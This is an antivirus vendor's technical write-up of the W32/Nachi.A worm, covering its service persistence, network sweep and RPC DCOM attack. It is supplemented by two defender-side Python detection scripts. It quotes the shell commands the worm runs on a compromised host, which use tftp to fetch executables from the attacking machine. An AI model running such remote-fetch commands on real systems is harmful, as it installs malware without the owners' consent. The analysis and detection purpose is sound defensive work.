FRISK Software International


Summary of W32/Nachi.A
Alias: W32.Welchia.Worm, W32/Nachi.worm, WORM_MSBLAST.D
Length: 10.240 bytes
Discovered: 18 Aug 2003
Definition files: 18 Aug 2003
Risk Level: Low
Distribution: Low
Infection Method: Network distribution; scans for hosts vulnerable to the RPC DCOM buffer overrun vulnerability
 

Brief Description
W32/Nachi.A is a worm currently spreading in the wild. It attempts to exploit hosts vulnerable to the RPC DCOM buffer overrun vulnerability. Once running, it attempts to remove W32/Msblast.A from the system and to install the Microsoft security patch which addresses this vulnerability. It removes itself from the infected system automatically if the system year is 2004.


Technical Description
W32/Nachi.A is a worm which distributes itself by searching for hosts vulnerable to the RPC DCOM buffer overrun vulnerability, in a similar fashion to the W32/Msblast worm. Its body is compressed with a modified version of the UPX executable compressor, giving a file size of 10.240 bytes.

After its initialization routine, the worm immediately tries to create a mutex named 'RpcPatch_Mutex'. If this mutex already exists, indicating that another copy of the worm is already running in memory, the worm exits. If no such mutex exists, the worm continues its execution.

After retrieving the system directory of the infected system, the worm tries to copy the original 'tftpd.exe' file (part of the Trivial File Transfer Protocol service found on every Windows NT 4.0, 2000 and XP system) from '%system_directory%\dllcache' to the directory '%system_directory%\wins' under the new name 'svchost.exe'.

The worm creates two services on the infected system. After connecting to the service control manager to verify whether these services already exist, it creates the following service, which relies on the copy of 'tftpd.exe' the worm just made. This service is supported by registry values similar to those listed below:

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RpcTftpd]
"Description"="Coordinates transactions that are distributed across two or more databases, message queues, file systems, or other transaction protected resource managers."
"DisplayName"="Network Connections Sharing"
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):[%system_directory%\wins\svchost.exe] (this value is represented in hexadecimal format)
"ObjectName"="LocalSystem"
"Start"=dword:0000000X
"Type"=dword:00000110

If the worm isn't executed from the '%system_directory%\wins' path, it copies itself from its original location to the directory '%system_directory%\wins\' as DLLHOST.EXE. The worm then creates another service intended for the worm executable itself. This service is supported by registry values similar to those listed below:

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RpcPatch]
"Description"="Maintains an up-to-date list of computers on your network and supplies the list to programs that request it."
"DisplayName"="WINS Client"
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):[%system_directory%\wins\DLLHOST.EXE] (this value is represented in hexadecimal format)
"ObjectName"="LocalSystem"
"Start"=dword:0000000X
"Type"=dword:00000110
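As an added, defender-side illustration (not part of the original analysis), the following Python script parses a .reg-style export of the Services hive and flags entries that match the two service descriptions above. The sample export, the C:\WINNT path and the matching rules (service names RpcTftpd/RpcPatch, the two display names, and an ImagePath ending in \wins\svchost.exe or \wins\dllhost.exe) are constructed here from the values listed in the analysis.

```python
import re
# Constructed .reg export of the Services hive (not from the original analysis): one benign
# service plus the two entries described above. ImagePath is given in both forms an export
# uses: hex(2) (REG_EXPAND_SZ as UTF-16LE bytes, continued with a trailing "\") and REG_SZ.
SAMPLE_REG = r'''[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Browser]
"ImagePath"="C:\\WINNT\\system32\\services.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RpcTftpd]
"DisplayName"="Network Connections Sharing"
"ImagePath"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,4e,00,54,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,77,00,69,00,6e,00,73,00,5c,00,\
  73,00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RpcPatch]
"DisplayName"="WINS Client"
"ImagePath"="C:\\WINNT\\system32\\wins\\DLLHOST.EXE"
'''

KEY_RE = re.compile(r'^\[HKEY_LOCAL_MACHINE\\SYSTEM\\[^\\]+\\Services\\([^\\\]]+)\]$', re.I)
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')
WORM_SERVICE_NAMES = {'rpctftpd', 'rpcpatch'}
WORM_DISPLAY_NAMES = {'network connections sharing', 'wins client'}
WORM_IMAGE_RE = re.compile(r'\\wins\\(svchost|dllhost)\.exe$', re.I)  # strongest indicator

def _decode_value(raw):
    if raw.startswith('hex(2):'):  # REG_EXPAND_SZ: UTF-16LE bytes, NUL-terminated
        data = bytes(int(b, 16) for b in raw[7:].split(',') if b)
        return data.decode('utf-16-le').rstrip('\x00')
    # quoted REG_SZ: a doubled backslash encodes one backslash; dword etc. kept verbatim
    return raw[1:-1].replace('\\\\', '\\') if raw.startswith('"') else raw

def parse_services(reg_text):
    """Return {service_name: {value_name: decoded_value}}, joining backslash-continued lines."""
    services, current, buf = {}, None, ''
    for raw in reg_text.splitlines():
        buf += raw.strip()
        if buf.endswith('\\'):  # value continues on the next line
            buf = buf[:-1]
            continue
        line, buf = buf, ''
        if key := KEY_RE.match(line):
            current = services.setdefault(key.group(1), {})
        elif current is not None and (val := VALUE_RE.match(line)):
            current[val.group(1)] = _decode_value(val.group(2))
    return services

def find_nachi_services(reg_text):
    """Names of services matching the persistence indicators in the analysis."""
    return [name for name, v in parse_services(reg_text).items()
            if name.lower() in WORM_SERVICE_NAMES or WORM_IMAGE_RE.search(v.get('ImagePath', ''))
            or v.get('DisplayName', '').lower() in WORM_DISPLAY_NAMES]
```

Run against a real export with `find_nachi_services(open('services.reg').read())`; the ImagePath match is the strongest of the three indicators, since display names are easy to reuse.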

W32/Nachi.A then takes a snapshot of the running processes and compares their names to 'msblast', the process name used by the A variant of W32/Msblast. If the worm detects a process running under that name, it attempts to terminate it. The worm then carries out a routine intended to remove W32/Msblast.A from the local hard drive, by deleting the file named 'msblast.exe' under %system_directory%. Both routines are aimed at the W32/Msblast.A variant; they won't affect other W32/Msblast variants.

After this, W32/Nachi.A gets the local system time. If the year is 2004, it removes itself from the computer by calling a sub-routine which deletes its service entries (both 'RpcPatch' and 'RpcTftpd') and removes its copy from the hard drive. If the year is not 2004, the worm starts initializing the strings and other data needed for its network functions.

The worm resolves the domain names "microsoft.com" and "download.microsoft.com". It gathers the version number of the Windows system running on the infected computer and checks whether the Microsoft security patch which addresses the RPC DCOM buffer overrun vulnerability has already been installed. If not, the worm gathers the needed information from the local system and retrieves the update from Microsoft's website. The worm identifies the following versions of Microsoft Windows:

Microsoft Windows 2000
English version
Korean version
Chinese (Traditional) version
Chinese (Simplified) version

Microsoft Windows XP
English version
Korean version
Chinese (Traditional) version
Chinese (Simplified) version


If the patch is successfully downloaded, the worm installs it by running the patch locally with the following command line:
security_patch_name.exe -n -o -z -q

W32/Nachi.A spreads through networks. In order to find surrounding machines, an infected host sends out ICMP 'Echo' packets (also referred to as 'Ping' packets). The worm's usual method is to take the IP address of the infected system and send an ICMP packet to each available address (1-254) in the last two octets of that IP address. At times the worm might start off from a semi-random IP address. The generated traffic might resemble the following when viewed with a packet-capture tool:

Source:             Destination:    Protocol:  Info:
Infected system IP  xxx.xxx.xxx.1   ICMP       [Type: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP  xxx.xxx.xxx.1   ICMP       [Type: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP  xxx.xxx.xxx.1   ICMP       [Type: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP  xxx.xxx.xxx.1   ICMP       [Type: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP  xxx.xxx.xxx.1   ICMP       [Type: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP  xxx.xxx.xxx.1   ICMP       [Type: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]


These packets are sent out and processed by individual threads within the worm's body. The number of running threads varies from around 14 up to around 40.

If the worm receives a reply to one of these ICMP packets, it responds by sending a TCP packet with the SYN flag set to port 135 on that machine. If the remote machine responds with an ACK packet (indicating that it is a possible target), the attacking system carries out an attack against that host. The main attack vector deployed by W32/Nachi.A is exploitation of the RPC DCOM buffer overrun vulnerability; it has a built-in exploit for this vulnerability which functions on both Microsoft Windows 2000 and Microsoft Windows XP. If the attack against the remote host is successful, it spawns a command shell which then contacts the attacking machine. Once the shell is open, the worm connects to it and issues the following commands:

dir wins\dllhost.exe
dir dllcache\tftpd.exe
tftp -i [ip address of the attacking system] get svchost.exe wins\SVCHOST.EXE
tftp -i [ip address of the attacking system] get dllhost.exe win\DLLHOST.EXE

The worm performs these communications on a port in the range 666 to 766 on the attacking machine, which is determined by part of the network setup routine.

If those files are successfully retrieved, DLLHOST.EXE is executed and the shell closed.
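The spreading sequence described above (ICMP sweep of the host's own /16, SYN to TCP/135 on a responder, then the compromised host connecting back to a port between 666 and 766) can be correlated from flow records. The following Python script is an added example, not part of the original analysis; the flow-record format, the addresses, and the sweep threshold of 5 hosts are constructed assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network
# Constructed flow records (not from the original analysis) in "time src dst proto detail"
# form: infected host 10.1.2.3 pings addresses in its own /16, probes the one responder on
# TCP/135, and that host then connects back to a port in 666-766 and fetches files via TFTP.
SAMPLE_FLOWS = """\
10:00:01 10.1.2.3 10.1.2.1 ICMP echo-request
10:00:01 10.1.2.3 10.1.2.2 ICMP echo-request
10:00:01 10.1.2.3 10.1.2.4 ICMP echo-request
10:00:01 10.1.2.3 10.1.2.5 ICMP echo-request
10:00:01 10.1.2.3 10.1.2.6 ICMP echo-request
10:00:01 10.1.2.3 10.1.2.7 ICMP echo-request
10:00:02 10.1.2.7 10.1.2.3 ICMP echo-reply
10:00:02 10.1.2.3 10.1.2.7 TCP 135 SYN
10:00:03 10.1.2.7 10.1.2.3 TCP 707 SYN
10:00:04 10.1.2.7 10.1.2.3 UDP 69
10:00:05 10.1.9.9 10.1.9.1 ICMP echo-request
"""

SWEEP_THRESHOLD = 5               # distinct hosts pinged inside the source's /16 (tunable)
CALLBACK_PORTS = range(666, 767)  # shell rendezvous port range named in the analysis

def parse_flows(text):
    """Split each record into (src, dst, proto, [detail...]); the timestamp is not needed."""
    return [(f[1], f[2], f[3], f[4:]) for f in (line.split() for line in text.splitlines())]

def detect_nachi_spread(text):
    """Return {source: [stages seen]} for hosts showing the sweep / probe / callback sequence."""
    pinged, probed, callbacks = defaultdict(set), defaultdict(set), defaultdict(set)
    for src, dst, proto, detail in parse_flows(text):
        if proto == 'ICMP' and detail == ['echo-request']:
            if ip_address(dst) in ip_network(f'{src}/16', strict=False):
                pinged[src].add(dst)               # stage 1: sweep of the host's own /16
        elif proto == 'TCP' and detail == ['135', 'SYN']:
            probed[src].add(dst)                   # stage 2: RPC DCOM probe of a responder
        elif proto == 'TCP' and int(detail[0]) in CALLBACK_PORTS and src in probed.get(dst, ()):
            callbacks[dst].add(src)                # stage 3: probed host calls the attacker back
    findings = {}
    for src in list(pinged) + [s for s in probed if s not in pinged]:
        stages = []
        if len(pinged.get(src, ())) >= SWEEP_THRESHOLD:
            stages.append('icmp-sweep')
        if probed.get(src):
            stages.append('rpc-135-probe')
        if callbacks.get(src):
            stages.append('shell-callback')
        if stages:
            findings[src] = stages
    return findings
```

A host reported with all three stages has completed the whole sequence the analysis describes; a sweep alone is the earliest point at which an infected machine can be isolated.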

The worm contains the following string, which is never shown to the end user:
"=========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice: 2004 will remove myself:)~~ sorry zhongli~~~========== wins"


Analysis / Description: Sindri Bjarnason - Virus analyst FRISK Software International
 